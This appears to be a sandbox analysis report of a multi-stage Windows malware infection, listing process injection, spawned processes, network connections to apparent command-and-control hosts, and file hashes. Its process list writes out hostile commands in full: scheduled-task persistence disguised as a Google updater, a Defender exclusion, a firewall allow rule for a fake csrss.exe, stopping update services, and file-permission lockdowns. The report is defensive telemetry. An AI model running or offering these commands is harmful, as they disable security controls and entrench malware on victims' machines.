Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2B2E.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2940 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe

"C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 284

C:\Users\Admin\AppData\Local\Temp\819E.exe

C:\Users\Admin\AppData\Local\Temp\819E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\842E.exe

C:\Users\Admin\AppData\Local\Temp\842E.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\869D.tmp\869E.tmp\869F.bat C:\Users\Admin\AppData\Local\Temp\85D5.bat"

C:\Users\Admin\AppData\Local\Temp\85D5.bat

"C:\Users\Admin\AppData\Local\Temp\85D5.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 280

C:\Users\Admin\AppData\Local\Temp\897E.exe

C:\Users\Admin\AppData\Local\Temp\897E.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 132

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\8CE8.exe

C:\Users\Admin\AppData\Local\Temp\8CE8.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3024 CREDAT:340993 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\8EDC.exe

C:\Users\Admin\AppData\Local\Temp\8EDC.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1444 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\C47D.exe

C:\Users\Admin\AppData\Local\Temp\C47D.exe

C:\Users\Admin\AppData\Local\Temp\1C5E.exe

C:\Users\Admin\AppData\Local\Temp\1C5E.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {A569FB2E-AC63-4F85-9D61-B1FE97CAC294} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\2B2E.exe

C:\Users\Admin\AppData\Local\Temp\2B2E.exe

C:\Users\Admin\AppData\Local\Temp\3414.exe

C:\Users\Admin\AppData\Local\Temp\3414.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1444 CREDAT:209935 /prefetch:2

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010231327.log C:\Windows\Logs\CBS\CbsPersist_20231010231327.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {447DABF4-59EE-4D2E-B2B4-38F9B81E26D0} S-1-5-18:NT AUTHORITY\System:Service:

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 accounts.google.com udp
RU 5.42.65.80:80 5.42.65.80 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
CZ 157.240.30.35:443 fbsbx.com tcp
CZ 157.240.30.35:443 fbsbx.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 accounts.youtube.com udp
US 142.250.145.102:443 accounts.youtube.com tcp
US 142.250.145.102:443 accounts.youtube.com tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 104.21.61.162:80 bytecloudasa.website tcp
NL 194.169.175.127:80 host-host-file8.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

MD5 1377782f5fbac0d78f45f7d690db24ce
SHA1 398ab45285f557c948b32c23dc050158852ec1f3
SHA256 9b3ae39eb225c49ca428bbff68f2c33a6c891c68d2ad9d58f47cb88c1b3bfee4
SHA512 88ba89b96ddaa267f59aea901684e355a6549ec92dc210a3f7d4a42e32dfad73995da30f4063c0331b16673c5fc65b361b1bf898f2be2b8d86aeba102f4d9f92

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

MD5 1377782f5fbac0d78f45f7d690db24ce
SHA1 398ab45285f557c948b32c23dc050158852ec1f3
SHA256 9b3ae39eb225c49ca428bbff68f2c33a6c891c68d2ad9d58f47cb88c1b3bfee4
SHA512 88ba89b96ddaa267f59aea901684e355a6549ec92dc210a3f7d4a42e32dfad73995da30f4063c0331b16673c5fc65b361b1bf898f2be2b8d86aeba102f4d9f92

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

MD5 1377782f5fbac0d78f45f7d690db24ce
SHA1 398ab45285f557c948b32c23dc050158852ec1f3
SHA256 9b3ae39eb225c49ca428bbff68f2c33a6c891c68d2ad9d58f47cb88c1b3bfee4
SHA512 88ba89b96ddaa267f59aea901684e355a6549ec92dc210a3f7d4a42e32dfad73995da30f4063c0331b16673c5fc65b361b1bf898f2be2b8d86aeba102f4d9f92

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

